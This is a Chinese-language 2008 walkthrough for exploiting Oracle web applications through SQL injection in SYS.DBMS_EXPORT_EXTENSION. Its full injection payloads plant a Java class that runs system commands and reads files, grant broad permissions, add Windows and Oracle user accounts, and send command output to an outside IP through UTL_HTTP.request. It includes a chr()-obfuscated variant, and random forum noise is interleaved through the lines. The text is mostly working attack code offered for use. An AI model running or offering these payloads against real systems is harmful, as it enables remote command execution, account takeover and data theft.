
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在web上的sql plus执行的,在web注入时把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) & s+ a2 q5 u# q" K
的形式即可。(用 " 'a'|| " 是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面有两个函数:runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
5 J- f2 D; w2 M! x/ v% L0 qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  m% h- n+ p" f0 _+ bcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
4 L' C- g" }) c' x( A7 M, y7 Vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. L; l4 O" w( W7 V, O/ y/ Y. V}'''';END;'';END;--','SYS',0,'1',0) from dual
8 ?1 q8 n$ `; R- D& `2 L% g)
8 p0 G. T6 H! l. y, a------------------------ 9 _+ f* M1 g7 s, [+ U" g0 @5 F' T
如果url有长度限制,可以把readFile()函数块去掉,即:
) j9 A3 I- W$ S5 N/xxx.jsp?id=1 and '1'<>'a'||(
+ G8 [. W; S& x4 c& Aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: }& |9 u6 L5 r" acreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(% H; X3 V  T" Q2 X* F
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
* X" I" h( T) [4 u+ M- I  v- M}'''';END;'';END;--','SYS',0,'1',0) from dual : E7 X4 `% T9 f& B: y
) 2 p4 [/ A7 o) G: `. U# j* Q
同时把后面步骤 提到的 对readFile()的处理语句去掉。
! j# l; |" b& g4 v" Z------------------------------
2.赋Java权限
6 {: Z5 h# Z+ n( |3 M  [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 `& k2 q% m% n! z7 X& N* r8 Ocreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
6 S+ E5 {0 Q! tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 c+ y8 ~6 B" g5 u9 T# N
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual& w) ?" M) }4 ]1 X
4.赋public执行函数的权限
0 q9 \/ p) E- N  \. eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual. Q+ I( N. O" W! o2 @+ E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
7 H: f8 J7 C% |and '1'<>'11'||( : ~1 Y. ~1 ~% ^. I
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
2 |$ F; k: I/ ?+ z, D$ y) ! O# j) z, |$ S$ t
and '1'<>( , U7 t% m) z% ?. U# f
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 1 R9 ]" K+ p. z6 T
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>( ; T/ W) @  v5 ?- `* _7 \
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 9 K9 C5 d2 M  t5 M5 t4 V

" C3 `( e' |3 ^' U7 X)
: X# t" ^7 [: |- ^/xxx.jsp?id=1 and '1'<>(
% u1 {) {9 B% o1 N( Hselect  sys.LinxReadFile('c:/boot.ini') from dual* M% x  d! s0 C5 ?) U; _6 x& `: ^
" N4 q% o5 M2 g4 L6 L5 p
)
: D' \7 Q6 d  v9 h4 D5 ^  
注意:sys.LinxReadFile()返回的是varchar类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
5 \9 ]0 h: C  z( D" H$ A6 N/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual- \- I5 T! Z& k0 t
或者UTL_HTTP.request(:
) g0 p9 Q2 _. X  S+ L) m9 \/xxx.jsp?id=1 and '1'<>(
: ~# T9 {; Q6 u+ E- k# gSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
7 h: Y$ Z/ V0 P9 P- {' H) 2 g/ U7 r  W! h1 i
/xxx.jsp?id=1 and '1'<>( 3 H" @+ m: n) l
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
/ @& @1 I9 e! v# g5 r$ k+ r5 e) 1 F2 G; b1 w' [6 q# z
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%') ^$ V$ w3 \1 A3 u  ?$ q( Y/ I
7.删除我们创建的函数
& H& h. R2 l3 _  Y+ [: aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 j5 y1 @; ?  t9 Zdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
' J/ p& z/ ?. _5 ?2 i& c==================================================== + k7 |+ b' n2 P/ ]; R6 z
全文结束。谨以此文赠与我的朋友。
8 B" x) B9 ?: O/ ylinx
" f8 m- I. |  w: p124829445
+ L5 F' H5 R! M2008.1.12
/ _2 w& e" C. R2 k( c) _; }linyujian@bjfu.edu.cn 3 p% B) }, ^, F0 m
====================================================================== * c$ H+ |9 q1 `; O6 U) U# o/ h
测试漏洞的另一方法:
创建oracle帐号:
. L7 ~. W( q( _) rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 G& ^$ a+ j' Q" K# x/ v$ S
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual+ |( x* t6 u. J, x4 E0 |3 D
即:
4 T, @4 T  }$ h* ]' @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
0 z0 o" Y% B2 n, S! Dchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(
% N# _! |) |9 I* }+ q* L' vselect user_id from all_users where username='LINXSQL'
" F* |$ ]6 R/ ?5 ]# }0 J/ N) ?) ) g. v% v" p* U' R4 o1 L
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% c, d7 `1 i4 z& E' y
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ I3 n/ T0 I$ U5 Jdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
, D9 f4 ^; g, z# y7 |7 E8 e======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1";但其权限是继承调用者的,可能仅仅是public权限,作用似乎不大。
1.jsp?id=1 and '1'<>(
7 I3 h3 s# J+ ?# jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 Z4 I: K9 K; S  x7 h1 D1 t9 Screate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual' N# X7 A7 c% h9 ]7 c
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
# r+ T% r+ z7 E, ^ )
: `- A, M5 Y* t( Z0 U6 `9 D
$ D; e5 O9 i8 d+ C$ n2 v: U
0 |* E) @* b4 Q. q9 L
' c5 W" U4 ]) n" a7 E  f